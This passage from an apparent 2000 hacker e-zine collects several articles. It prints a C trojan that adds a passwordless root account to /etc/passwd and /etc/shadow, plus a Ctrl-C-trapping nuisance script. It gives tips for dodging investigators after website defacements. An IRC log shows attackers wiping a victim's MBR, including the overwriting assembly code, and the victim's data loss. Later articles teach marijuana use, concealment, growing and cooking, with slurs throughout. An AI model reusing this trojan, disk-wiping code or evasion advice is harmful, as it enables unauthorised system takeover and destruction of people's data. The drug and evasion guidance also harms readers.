/etc/shadow. In closing, I'll present you with what I call the hello-world-passwd- trojan: ----Begin copy here----hello.c---------by MagicTux---- #include /* For you ignorant fuck, compile with gcc -o hello hello.c and put hello int root's homedir or sumthin */ void main() { printf("Hello, World\n"); system("echo 'magictux:*:0:0:magictux,0wnz,j00,!:/magictux:/bin/bash' >> /etc/passwd'"); system("echo 'magictux::::::' >> /etc/shadow"); } --------Ok, you can stop copying now-------------------- So compile the program and put it in root's dir or sumthin. And now we'll assume root is this REAAAAAALLY stupid guy, and he actually runs your prog. He gets Hello world printed into his screen and thinks everything's all right (remember, he's really stupid). So now that this stupid little fuck actually ran your program, you should be able to login with magictux (no actually you shouldn't, get an own nick!)without a password prompt. Enjoy!!! ;) ============== V.) Conclusion ============== So, now that you're such a kick ass leeto h4x0r, go pick up the next hot ch1x0r j00 see and impress her with your leeto echo '' >> bla commands and stuff. Show her how leet you are and make her a leeto root account. After you impressed her, fuck her. Also, you've probably read a thousand guides telling you that you should pick your password really weird, something like Ac397cjklae27ac.j3+a73. Don't listen to them, they all suck. Just have your password have two capital letters and 2 or 3 numbers and you'll be doing fine. Have your password something like 7l3eT0Iam (7leetoiam), it's easier to remember (might not make any sense, but at least you have a word in it) and still safe. I'm quite sure nobody will guess that. And anyway if you're totally paranoid or sumthin, get BSD, cause it uses blowfish instead of DES which is a whole fuckin lot securer. Also you could maybe set up a tripwire on the /etc/passwd and /etc/shadow files. Well, maybe you could, probably not because you suck. But you can always try! Also, I plan on writing this ultra-secure login and password stuff. It's gonna use rot13 encryption. So, wait for it. I'll publish it sometime. I'm gonna write a new login for linux and stuff, that will use rot13 encryption and a passwd program that will change your password to a rot13 encrypted one. Oh yeah, and it's not even going to be shadowed. I tell ya, no one can crack rot13 ;) Seriously, so after I gave it to you, you'll have to give me your ip, just so, not that there's any reason ... Maybe, sometime I'll make this ultra-super-secure login and password stuff that won't use any encryption and shadowing at all. Man, that would rock!!! But that'll take a while, until I've made that. Have fun! ============================== VI.) The b0g 0wnz j00! Program ============================== ----Begin copy here----b0g0wnzj00.sh---by MagicTux----- #!/bin/sh trap 'echo b0g 0wnz j00!' INT while true do echo "b0g 0wnz j00!" echo -e \\a done --------Ok, you can stop copying now-------------------- What does this program do: It goes into an infinite loop of printing b0g 0wnz j00! and beeping. It traps ^C so you cannot exit it except for kill -9 -ing it. Recommended Uses: ./b0g0wnzj00.sh > tty ./b0g0wnzj00.sh The author of this article is not responsible for any damage caused .......... This document is meant for educational purposes only ......................... ];-> <-;[ b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [ 8:. - [ Counter Hacker Profiling ] [ripped_edge] :. ] [Ripped_edge@hotmail.com] :. ] ____________________________________________________________________ Some time ago Anti Online posted a piece entitled, "Hacker Profiling" I read it considered it and then forgot it. Recently ph33r-the-b33r defacements have taken to addressing this theme. While they hit some basic points they don't go deep enough into how you can thwart profilers. So here it is Counter Profiling. First off lets discus the current method for tracking down and prosecuting hackers/crackers/script kiddies. One would think that the feds are hot on the tails of every one who defaces. If you look at the mirrors and figure a five-man team for each defacer, you suddenly have a huge army looking for defacers. Of course this is not how it works. The feds get involved when 1) A company makes a big fuss 2) A company losses a bunch of cash 3) Serious threats are made, or 4) The person keeps on doing it. So the first step in avoiding hacker profilers is, don't cause monetary damage, don't piss off the admin too much by deleting everything off the server, and spread them out. Those people who have blocks of 5 to 10 hacks all in a row on attrition will gain more fed attention than 10 defacements spread out over a few months. (Get a life, more than 3 sites in a day and you have toooo much free time) Next up: Your IRC habits, they are bad. People in IRC have no clue who they are talking to. Never tell people where you live, what you do, who your friends are etc. Create separate dentifies. For instance, I (Ripped) go by several names. The people, who know me in real life have no clue that they know Ripped_edge, they know me as some one else. Nothing connects my identifies. For example about 6 months ago before I was Ripped I was known as Arkan. Arkan lived somewhere in Indiana worked for a large networking company, and was starting college some where around there. None of that is remotely true. Nothing pertaining to what I tell people I do now with this nick is remotely true. By covering your tracks you make it that much harder to be profiled. Your host name on IRC, lost of ways to fix this. Some people use a free ISP where they entered bogus names and such, good, but did you bother to check if they log phone calls? Ouch. Next up spoofing accounts, good and nice proof of your l33tness, but when you enter a chat room as user@fbi.gov, profilers know you are spoofing and start working on it. Stolen accounts, possibly the best, but again make sure the ISP does not log phone calls. My personal fav is realistic spoofing. Rather that risk stealing an account or spoofing outrageous host why not spoof something like user.userid.coolispthatidontuse.com. The profiles will spend ages talking to that ISP only to find no account exists, and you in the mean time are gone. One thing to note always be consistent, spoof the same host every time, else the ruse is up. Going back to the identify deal. Ideally you have an identity for each different defacement, a separate identity for IRC, and then a few others for fun. Never discuss your identifies with friends or any one. Never discuss your defacements or provide any clues that could link your identities together. Why people feel the urge to brag about their hacks is stupid. You'll just get caught faster. Your friends in this world will not always be your friends. I was sitting in on one group and collecting information. (Yup, I'm a hax0r profiler too) There was one member of this group who for the life of me I could not get any info on. I knew the city he lived in but that was about it. All the others I had addresses, pictures, phone numbers, the works. Suddenly a huge rift split the group into two groups and ended up isolating the one member I had no info about. My chance, which I jumped at and I now had his address and phone number and picture. A complete list of the entire group, how nice. Now if he had not told his friends so much about him I would not know any thing, but now I do. Profilers are more than happy to take advantage of intra group wars, and they can be quite profitable. A few other points: Make sure you know whom bots belong to and don't let other in. Watch for people who ask a lot of personal questions, and people who never talk two traits of a profiler. Remember most profilers are NOT feds but security consultants, they don't have search warrants and ISP don't help them then, with some Identity shuffling you can thoroughly confuse these profilers. Do not discuss you actions with others No links between online life and offline life Nothing on your computer should be able to identify you In Anti online's hacker profiling series they use one example of a person saying, "I'm off to play quake" as what was needed to break the case. Yup its true sometimes that's all you need. But lets say you had an identity that you used on that server that said you went to xyz university and not the abc one that you really attend. As you�re off to play quake, the profiler is off to waste time digging through and watching some poor soul at the wrong university. Lastly remember to keep your identities strait. Think carefully about whom you are supposed to be and answer (and talk if you have some dialect studies under your belt) accordingly. If you do confuse them and start confusing people, remember it's better for them to be confused with all sorts of erroneous info than to have the right info. And keep your mouths shut about your hacks. It makes my job too easy, and I need a challenge. (The whole point of me writing this) Ripped_edge ripped_edge@hotmail.com h0h0h0 ph33r the h0tmail hax0r Ph33r-the-b34r forever! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [ 9:. - [ rap Vs the viruscoders part 2! ] [evul] :. ] [evul@coderz.net] :. ] ____________________________________________________________________ Start of Evul buffer: Mon Aug 14 01:45:23 2000 Session Ident: Evul [01:02] <^mdrg^> so ? [01:02] <^mdrg^> what should i do ? [01:03] about ? [01:03] rupture ? [01:03] got a gun ? [01:03] <^mdrg^> i'm on his HD [01:03] rm -r [01:03] he deserves it [01:03] <^mdrg^> u missed the /msg while cycling [01:03] =] [01:03] I was too lagged to talk to any one [01:04] <^mdrg^> hmmm.. what about cih 1.5 ? [01:04] <^mdrg^> w/ bios erasing [01:04] <^mdrg^> and mbr murder [01:04] hehehe [01:04] <^mdrg^> i'd better steal his passes [01:04] <^mdrg^> logs, and so on [01:05] kill him .. [01:05] <^mdrg^> then trojanise the sucker [01:05] =] [01:05] * ^mdrg^ is definitively a bad boy [01:05] no no [01:05] <^mdrg^> he'll know the spicekill nightmare [01:05] thats a good thing [01:06] if any fuck in this world deserves it .. tis him [01:06] <^mdrg^> i never done this b4 [01:06] <^mdrg^> wipin a whole HD [01:06] I figure you havent .. but what the fuck [01:06] =] [01:06] <^mdrg^> there'z a first time for everything [01:07] <^mdrg^> the sucker has lame toolz [01:07] hehehe [01:10] * Evul is waiting "...EOF From client." [01:10] hehehe [01:10] <^mdrg^> hehe [01:10] <^mdrg^> [.] [..] [01:10] <^mdrg^> [Common Files] [Plus!] [01:10] <^mdrg^> [CHAT] [Web Publish] [01:10] <^mdrg^> [DIRECTX] [REAL] [01:10] <^mdrg^> [NetMeeting] [Accessories] [01:10] <^mdrg^> [Internet Explorer] [FrontPage Express] [01:10] <^mdrg^> [Outlook Express] [Online Services] [01:10] <^mdrg^> [Norton AntiVirus] [Creative] [01:10] <^mdrg^> [ICQ] [Winamp] [01:10] <^mdrg^> [GetRight] [WindowsUpdate] [01:10] <^mdrg^> [WinZip] [MSMQ] [01:10] <^mdrg^> [AgateSoft] [01:11] <^mdrg^> gay appz [01:11] <^mdrg^> [SnadBoy Software] [Ogre] [01:11] <^mdrg^> [WhatsUp2] [Rio] [01:11] <^mdrg^> [MediaScience] [Legion] [01:11] <^mdrg^> [Signal9] [MSN Gaming Zone] [01:11] <^mdrg^> [MicroProse] [DBG_Setup] [01:11] <^mdrg^> [Windows Media Player] [Symantec] [01:11] <^mdrg^> [FasaInteractive] [Logitech] [01:11] <^mdrg^> [BlackWidow] [Diamond] [01:11] <^mdrg^> [Black Isle] [Activision] [01:11] <^mdrg^> [Championship Manager 99-00] [Diablo II] [01:11] <^mdrg^> i'll have to disco n reconnect in 5 mins :( [01:11] BLOW HIM UP! [01:11] hehehe [01:14] hold up [01:14] shit he is running av [01:14] =\ [01:14] this is detectred [01:15] let him test that =P [01:16] <^mdrg^> wassat ? [01:16] win32 infector [01:16] <^mdrg^> nah.. [01:16] <^mdrg^> i want to nuke his MBR [01:17] I can code that in 2 minutes [01:21] <^mdrg^> u're @ work ? [01:23] HEY [01:23] I was done before yu left [01:23] =P [01:24] <^mdrg^> i wuz plannin to use debug [01:24] careful with that [01:24] =] [01:24] <^mdrg^> to write to the sectorz [01:24] <^mdrg^> don't worry ;) [01:24] thats 18 bytes of death [01:24] =P [01:25] <^mdrg^> E:\>type autoexec.bat [01:25] <^mdrg^> @ECHO OFF [01:25] <^mdrg^> mbr [01:25] <^mdrg^> SET SBPCI=C:\SBPCI [01:25] <^mdrg^> SET BLASTER=A220 I7 D1 H7 P330 T6 [01:25] <^mdrg^> SET SNDSCAPE=C:\WINDOWS [01:25] <^mdrg^> PATH=C:\WINDOWS [01:25] <^mdrg^> mode con codepage prepare=((850) c:\windows\COMMAND\ega.cpi) [01:25] <^mdrg^> mode con codepage select=850 [01:25] <^mdrg^> keyb uk,,c:\windows\COMMAND\keyboard.sys [01:25] <^mdrg^> @C:\PROGRA~1\NORTON~1\NAVDX.EXE /Startup [01:25] <^mdrg^> path "%path%;C:\Perl\bin;" [01:25] <^mdrg^> now.. we have to make him reboot [01:26] thats easy enuff .. [01:26] cant ya send command "exitwin" ? [01:26] <^mdrg^> i can only read and write to his HD [01:27] <^mdrg^> so i put ur proggy in \ and placed the cmd in autoexec.bat [01:27] =] [01:27] ya man [01:27] then he gets one more session [01:27] <^mdrg^> i'm DoSing him [01:27] I *could* fix the prog to hang up after nuking the MBR [01:27] <^mdrg^> right know [01:27] so then he wont get back to OS [01:27] =] [01:28] <^mdrg^> nah [01:28] <^mdrg^> i just DoS him so he'll have to reboot [01:28] <^mdrg^> but if ur proggy is ok, he won't come back [01:29] after reboot . he will have one more windows session [01:29] cause the disk will boot before the program runs [01:29] the next reboot will fail [01:29] but its too late then .. damage done [01:29] <^mdrg^> add a 'jmp $' [01:29] =P [01:29] <^mdrg^> he'll have to reboot [01:29] <^mdrg^> quick quick ! [01:29] right [01:29] hang it up [01:30] <^mdrg^> i hope that i didn't alread DoS him [01:31] <^mdrg^> it's ok ? [01:31] that one will not allow another reboot [01:31] <^mdrg^> sweet revenge :) [01:31] hehehe [01:31] hell yes [01:32] =] [01:33] begin: [01:33] mov ax, 0301h [01:33] mov cx, 1 [01:33] mov dx, 80h [01:33] lea bx, begin [01:33] int 13h [01:33] jmp begin [01:33] it writes over and over and over [01:33] if he lets it go long enuff .. it may even fuck that sector up [01:33] ghehehe [01:34] <^mdrg^> ok it's prefect [01:34] <^mdrg^> re-DoSing [01:34] hell ya [01:34] [01:34] I ahvent felt this good about revenge in a long time [01:34] <^mdrg^> better be my friend :)) [01:34] =] [01:35] I know =] [01:35] <^mdrg^> Resolving Hostnames... [01:35] <^mdrg^> Creating Socket [01:35] <^mdrg^> Connecting... [01:35] <^mdrg^> Connected!... [01:35] <^mdrg^> Init Packets... [01:35] <^mdrg^> Launching Attack... [01:35] <^mdrg^> Sent packet(0) [01:35] <^mdrg^> Sent packet(1) [01:35] <^mdrg^> Sent packet(2) [01:35] <^mdrg^> Sent packet(3) [01:35] <^mdrg^> Sent packet(4) [01:35] <^mdrg^> Sent packet(5) [01:35] <^mdrg^> Sent packet(6) [01:35] <^mdrg^> Sent packet(7) [01:35] <^mdrg^> Sent packet(8) [01:35] <^mdrg^> Sent packet(9) [01:35] =] [01:37] <^mdrg^> damn.. he's patched [01:37] <^mdrg^> or he's timeouting [01:37] hmm [01:37] maybe I should boot linux and see if I can help ya nuke him ? [01:38] <^mdrg^> my bsd box is fucked [01:38] <^mdrg^> a bad ver of my vir [01:38] <^mdrg^> he [01:38] ouch [01:41] aiight [01:41] imma boot linux [01:41] brb [01:42] *** [rapture] has quit IRC (Ping timeout for [rapture][vt1- 66.du.tcp.co.uk]) End of Evul buffer Mon Aug 14 01:45:23 2000 Session Start: Tue Aug 15 00:45:44 2000 Session Ident: [rapture] (no@vt1-84.du.tcp.co.uk) <[rapture]> bob - [rapture] is no@vt1-84.du.tcp.co.uk * Mike [rapture] on +#k-rad [rapture] using austin.tx.us.undernet.org Illuminati Online - www.io.com [rapture] End of /WHOIS list. - yeah <[rapture]> this morning <[rapture]> i turned my pc on <[rapture]> to find my partition had been, well fried :/ <[rapture]> 7 gigs worth gone <[rapture]> so ive just quit did you loose anything um important? <[rapture]> well <[rapture]> only my data for the past 3 years <[rapture]> only everything im sorry man they told me about it earlier today <[rapture]> who is they? some virus guys <[rapture]> i fucking knew it <[rapture]> who were they <[rapture]> and what ddi they say whats your email? fuck it jsut hang on <[rapture]> rapture@tcp.co.uk http://www.b0g.org/rapt.txt you there? <[rapture]> yeah <[rapture]> right :/ <[rapture]> those guys...haha <[rapture]> anyhow <[rapture]> i found a ps2 mouse <[rapture]> so im gonna go have some fun of my own :) you not going mess wth them are you? <[rapture]> what they did <[rapture]> was so not nice <[rapture]> i dont have any of my roots you had it coming though <[rapture]> so im going to have to think of something <[rapture]> wanna know how they did it? open shares? * [rapture] had his h/d shared from using a friends network <[rapture]> yeah <[rapture]> i shared full access shame <[rapture]> i didnt use my pc enough to remember <[rapture]> i will just finosh getting this file from cat <[rapture]> then setup linux i guess yeah :/ Session Close: Tue Aug 15 02:23:30 2000 b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@!b0g!#@! ____________________________________________________________________ [10:. - [ The ultimate guide to marihuana ] [wh0rde] :. ] [wh0rde@b0g.org] :. ] ____________________________________________________________________ Apparently some of our fine readers are a bit dense in the head. Either that or the entire civilized world is a bit dense in the head, and knowing our readers, it *must* be the world. To explain things further, this article is a kind of part two, kind of reinforcement of part one. I got the following letter after part one was published: -----Opprinnelig melding----- Fra: uncle elbow Til: wh0rde@b0g.org Dato: 2. august 2000 01:28 Emne: issue 7, article 5 >hey. >i was just readin the latest issue of b0g, and i'd just like to represent. >the blunts you mention, on the east coast (at least where i live), those are >called Godfather blunts, where you unpack the tobacco and then stuff it in >instead of breaking the blunt. um yeah. excellent description of making a >bong. uh. keep smoking weed. >peace >uncle elbow > > >______________________________________________ >FREE Personalized Email at Mail.com >Sign up at http://www.mail.com/?sr=signup > > To protect the innocent, I will leave his email address so you can poke fun at him. Now, I dont know what kind of messed up shit you guys do to your Philly blunts, but I always unpack and stuff. This is a time-honored tradition, at least where I live, the Central-Eastern Coast. Im actually somewhat the "North Coast" if it exists, living in Chicago, IL. I only know one person who tears open blunts, but he is a certifiable retard, because he uses tape to seal the blunts.. and smokes the tape, saying its all natural. This man also talks as if he was "Big Poppa Mary Jane King God," a mystical rastafarian god who knows everything there is to know about weed. To disprove this, I simply had him buy me an eigth, which he a) got completely ripped off on, b) it was shitty weed, c) it was 1/2 seeds, and d) he was proud of his accomplishment. I refused to pay for it, and he got all ticked off and said he smoked it himself, and I simply said "I bet." If you want to know who this is his initials are TM, and he goes to school in Illinois. North Shore. Thats all Im givin you. Anyway now that we have covered blunts, its time for fun marijuana facts. Apparently it makes your penis larger. Note: this is a joke, but if you want to try, go ahead. #lpsg log [12:20] (dan0): hi guys [12:22] (dan0): does anyone want to chat seriously about this? [12:22] (wh0rde): sure [12:22] (wh0rde): about smoking joints? [12:23] (dan0): whats this rooms topic? [12:23] (wh0rde): smoking joints [12:23] (dan0): lpsg? [12:23] (dan0): not lpsg? [12:23] (wh0rde): smoking joints makes you have an abnormally large penis [12:24] (wh0rde): so we talk about smoking joints [12:25] (dan0): does it [12:25] (dan0): ? [12:25] (@wh0rde): yeah [12:25] (TheScorp): hst: you alive ? [12:25] (@wh0rde): duh [12:25] (dan0): has that wrked for you? [12:25] (@wh0rde): yes [12:25] (@wh0rde): grew about an inch smoking nice canadian buds [12:25] (@wh0rde): in a 6 month period [12:25] : holy shit Another fun fact is its safer than cigarettes. This is TRUE. Cigarettes have nicotine, which is addictive. Cigarettes are also very harsh, and the carbon monoxide and nasty tobacco and all that shit can hurt your lungs by covering them with tar. I saw some pretty nasty pictures of hardcore smokers from this "anti-everything" fruit who came to our school. Its like in Clerks, where the guy pulls out the lung. Wow. Anyway, weed is a lot safer, especially out of a bong since the smoke is cooled down, and some of the nasty shit is filtered out. Ill try to conduct some sort of research on this tomorrow, as I am plum out of weed today. Another great weed fact is that no, its not just green. Theres red, purple, green, and I think a few others. Ive only seen the red and green buds, I dont know if the purple really exist but my friend claims so. Living where I am sucks, I get commercial weed for high prices.. Ok, today is friday. I am going to a party on saturday in which I will test my hypothesis with a filter. Here is my.. scientific experiment crap: IDEA: To test whether Marijuana (straight out of paper, in "joint" fashion) is safer to consume than Tobacco (in cigarette form). I have read from various resources that it is true, but plan to test it myself. The context of safety Im using is tar and other harsh chemicals transfered in the smoke. METHOD: Im going to use a small "smoking filter" which smokes the cigarette and deposits the chemicals in the smoke into a white patch. Whichever has the more brown/black residue obviously has more abrasive chemicals. This experiment should be quite obvious, but some people still believe weed is "dangerous." DATA: Oh shit, ok, so I forgot the experiment and just got fucking blown, but lemme tell you it worked just fucking fine... nice and sweet buds.. oh Im gonna go for another toking session in like 20 minutes.. CONCLUSION: Weed is fucking smooth. Some more random shit. Last time I neglected to mention a device I used while trying the experiment. The steamroller. Fuck the gravity bong, the gay plastic bag bongs, the stupid home made bullshit, you need this and some bud, and youre fucking set. Step 1, find a metal pipe about the width of a fucking fat joint. Now, get a tiny screen that will cover one end with room to pack some weed. Now, pack the weed, and pull like a fucking hobo. You need iron lungs and experience, you will definetly hack up a lung if youre new. Fuck, you get blown like a leaf in the wind, you will go (EXCUSE THE RACIAL COMMENT, CAM2O!) chinese on that fucker. Yes, that was a rude racial comment, but I used the word retarded too much. For those who dont get it, asian americans have stereotypically "slanted" eyes, and when youre stoned you get all squinty and "look chinese." Sorry! Fuck you all! Go get stoned! ____//_____//________ PART FOUR ____\\_____\\________ --------------><----------------------------><-------------- Data (ICQ 53314246): I think a good idea for a story would be to have a parrot that was raised by eagles,it would be cute cause the parrot can't act like an eagle and then in order to keep the story from getting boring add some pornography,then at the end have the parrot flying off and see two parrots and start to attack then,but its his parents,then some more pornography. <----------------------------><----------------------------> Time to light up a fatty boom blatty blunt bitch! ooo. .oo. .oo. .oooo. oooo d8b oooo ooo `888P"Y88bP"Y88b `P )88b `888""8P `88. .8' 888 888 888 .oP"888 888 `88..8' 888 888 888 d8( 888 888 `888' o888o o888o o888o `Y888""8o d888b .8' .o..P' `Y8P' o8o `"' oooo .oooo. ooo. .oo. .ooooo. `888 `P )88b `888P"Y88b d88' `88b 888 .oP"888 888 888 888ooo888 888 d8( 888 888 888 888 .o 888 `Y888""8o o888o o888o `Y8bod8P' 888 .o. 88P `Y888P This is another complete guide to MY FAVORITE GIRL BESIDES MY GIRLFRIEND! Yes, my girlfriend is more important than Mary Jane, much more, because mainly my girlfriend is hot, and mary jane is a PLANT. Ok, well first off I want to keep doing the introductory things, bringing new people to the experience. This first part will be for you kids who have never smoked. ITS A WONDERFUL THING. If you have a girlfriend, its great to sit and chill with her whilst high, especially if a) she is too AND b) shes ok with you smoking. This posed a problem for me since my girlfriend a) doesnt smoke to my knowledge and b) hates when I smoke cigarettes or blunts or whatnot. Remedy? Give up smoking tobacco products and only get stoned when shes cool with it. Anyway, I always sidetrack in my articles, so good thing I got it done early. Smoking weed is a wonderful thing, theres nothing criminal about it. My first fear was what I would feel like, what would a "high" be. For me, a high is usually a few hours of unbridled comedy. Always smoke with people you know, you will end up being best of friends, you will laugh at every joke. Personally I have a very low tolerance for any drugs, including weed and alcohol, so after a few bowls I will be absolutely retarded. This is not a good thing if you're trying to act suave around a girl, because you will end up looking like Jerry Lewis. There is no harm in it, except if you have some sort of weak lung or heart. Want to know how many documented cases there are of people dying from an "overdose" of marijuana? ZERO. Yes, not one fucking person has died, because you cant, its like smoking a shitload of cigarettes. I do know people who have asthma but still smoke, and they do fine, even though it is far from healthy. The next general newbie question is "well what if my parents or a cop finds out Im stoned." Impossible, unless you are trying to do the funky chicken on a parked police car, which I can personally say is quite fun. You do not smell of weed after smoking it, unless you were hotboxing, which is locking yourself in a closed place with a smoking device, kind of like a steam room. If you walk around for about 10 or 15 minutes after smoking the smell will dissipate (it is a very faint smell) and you shouldnt worry. The only giveaway is red eyes, which can be fixed with Visine or Clear Eyes. The last newbie fear is a silly one, and that is embarassment. If you have never smoked before, make sure you smoke with someone who has your first time, so you know what the fuck to do. They will happily answer questions on anything, weed is a very fun topic. Ask about local prices, whos got the sticky ickies and whos got the stinkweed, or just how to roll joints and blunts. So remember, no matter how inexperienced you are, its ok to ask questions and act like a newbie. Now, we move to more important things. Last time I said you can unpack a phillie blunt and repack it with weed, and I got an email from an unidentified stoner saying "no man you slice em." Yes, you can do that, it does burn slower and wastes less. What you do is simply take a razor, slice down the length of the blunt, dump the tobacco, put in your sifted (take out stems, twiggs, seeds) weed, roll it, give it a lick and smoke. Some people prefer these retarded rolling papers that use blunt casings, they have honey and weird stuff in them that make them sweet, and easy to close, but Im not such a classy person.. Now, you probably know all sorts of shit about how to smoke weed, but what about obtaining it? This is the key part, the very very crucial part, unless you enjoy smoking an empty pipe. There are a few common courtesies associated with buying weed. If you dont have a dealer, ask your friends if they have dealers you could use, dont just randomly go up to people asking for weed. If you have the number or address of a dealer, dont ask for shit over their phone or go up to their house and ask, you *must* respect their privacy because you dont know whos listening. Next, when buying the weed, its nice if you smoke a joint with the dealer to close the transaction. The last thing you want is a pissed off dealer lacing your shit with fucked up drugs or just cutting out on you. Next, when smoking, you have to always abide by these rules: 1) NO LIPPING THE JOINT, BONG, PIPE, BLUNT, OR ANY OTHER THING. This means dont slobber on it, just lightly put the outside part of your lips on it and pull. If youre too retarded to pull normally, you deserve to be smacked around. 2) THOU SHALT NOT BOGART THE JOINT, BONG, PIPE, BLUNT, OR ANY OTHER THING. Bogarting is the act of taking way too many hits, going out of turn, or smoking someone elses weed without them knowing of it. You will get your ass beat royally, and possibly kicked out of the bong session, if not for just one round. 3) IF YOU ARE AROUND PEOPLE YOU DONT KNOW, DONT BE A RETARD. I have seen countless cases of my friends running around the local mall full speed playing tag, then getting yanked around by mall security. True, they cant do shit, but if cops come and see you being a retard, they will have probable search rights and pat you down for your bag or something. Also you dont want people to know youre stoned, no matter how hilarious it is. One day me and my friend walked around school telling everyone that we were stoned, and while we did laugh our ass off the entire time, we got a lot of odd stares from teachers overhearing parts of our conversation. 4) Dont ever fuck with the new kids. I was smoking with a friend and his friends, and one of my other friends, and when I got up to grab some food they actually had convinced him to try a glass of bongwater. He never wanted to speak to me again, for good reason. You are going to mess around when stoned, but try to keep it normal, and not go nuts. My friend Haider once tried to show me how I could theoretically cut off my arm if I wanted to, which scared the shit out of me. If you ever hear the words "Just hold still! IF YOU KEEP MOVING ILL FUCK IT UP!" run away very fast and dont ever smoke with that person again. 5) Dont, and I mean dont you EVER fucking try, to steal weed. If you see a bag lying around in an open place, even if you know you can take it, LEAVE IT. This is a bitch thing to do, and people get very protective of their shit. If you decide to skimp off the bag, it will be noticed, and that person will come looking for you. Weed is a precious commodity in these times, ya never know what stupid shit a stoner would pull for his bag. Now, this article is getting long and I hate long articles so Ill leave the last part up to an outside source. Growing weed is crazy, you need space, no visitors, a lot of equipment, and patience. The best guide I have found is also in this issue of b0g, it even has a few recipes for cooking weed. I have never attempted to grow weed except for a few shoots in my drawer right now (im taking after this guide) so dont email me about that. Thats all for now, until next time, au revoir, salut, ciao, cya... ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ' | | /~~||/~\/~\\ /||/~\ |~~\| |/~~| \__|| \_/ \/\/ || | |__/ \_/|\__| \__| ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ (not written by wh0rde) MARIHUANA: HOW TO GROW IT, REAP IT, AND COOK IT. Marihuana is available anywhere in the country, as the black market is widespread and thriving very well. There are many different methods of growing marihuana, and it seems everyone has just discovered the best fertilizer. I could not relay all the methods in five books, so have settled for the technique that has been proven most successful. Most seeds are fertile, but the best are from Mexico. Never under any circumstances throw seeds away, since marihuana is a weed and will grow almost anywhere. The first step is to soak your seeds overnight in clean, lukewarm water. YOur container should be a standard planter box. If this is not available, a plastic dish tray about two inches deep will serve uset as well. Fill the container with washed fine sand and shredded sphagnum moss. If this is not readily available, you can use regular soil. The soil should be packed firmly, and watered well so that the excess water is allowed to run off. Dig furrows the full length of the container about one-half-inch deep. Now you are ready to sow your seeds. Do so every inch. Fill in each furrow with soil, sand, moss, and water. Cover the container with a clear plastic sheet, and place it in a warm location where there are at least six hours of sunlight a day. The plants now remain on their own until they develop their first true leaves. Even it the material above is not available, almost the same degree of success can be accomplished by placing the seeds on several layers of water soaked paper towels. Now cover the seeds with a plastic sheet jsut as above, and expose to sunlight. In about one week, signs of life should start to appear. Within two weeks, definite little leaves should be present. This is the time to transplant. The plot you intend to use for your transplant should be carefully prepared. Manure should be used for at least one week in advance of the actual transplant. The soil should be similar to the original soil used in the germinating box. All other weeds, in the general area of your plot, should be pulled to allow your plant as much freedom as possible. The original germinating box should be watered the day before you are going to transplant, so as to make the move easier and less traumatic on the plants. The plants should be placed in holes two to three inches deep, depending on the size of the plant. The earth around the plant should be loose, and if possible, some earthworms should be added. If there is a lack of sunlight, a simple ring of tinfoil around the plant can be very helpful. The first few days are the most critical after the actual transplant. If the plants survive the shock, there should be no reason why they shouldn't grow into healthy, fully grown plants (which means, in certain climates, fifteen to twenty feet high). Very little care is needed after this stage, with the exception of fertilization. For fertilizers, one can use manure, soluble nitrogen, nitrate of soda, sulfate of ammonia, or rotting garbage (which has always been popular). To produce a stronger plant, on can clip off the lower leaves; do this only when the plant reaches a height of at least three feet. The ground surrounding your plant should be kept clear of other weeds, but strangely enough, insects ignore marihuana and do virtually no harm. As a rule, it is better to wait until the plants have gone to seed before they are cut, but if you're greedy, you can kill the goose that laid the golden egg. The best agent for drying is the sun, but if you live in the city it could prove embarrassing and dangerous to have five- or ten- foot pot trees on your fire escape- in this case a sun lamp can be used. When using the sun, drying usually takes about two weeks. With a sun lamp, the pot is smokable after only three or four days. When drying is done, separate the leaves and crush them. This will be the finest smoke, unless you have a female plant. If so, save the blossoms for the most potent smoke there is. The stems and twigs can be chopped up and smoked in a pipe, or sold to a friend. Grass is basically a weed and can be grown anywhere, including indoors with artificial light. A sun lamp works well from a distance of two to three feet. For an interesting experiment, use infra -red light on part of your crop and a sun lamp on the other part, then compare. A bathtub or cement mixer is an ideal planter for the city dweller. COOKING WITH POT Pot Soup 1 can condensed beef broth 3 tablespoons grass 3 tablespoons lemon juice 1/2 can water 3 tablespoons chopped watercress Combine all ingredients in a saucepan an dbring to a boil over medium heat. Place in a refrigerator for two to three hours, reheat, and serve. Pork and Beans and Pot 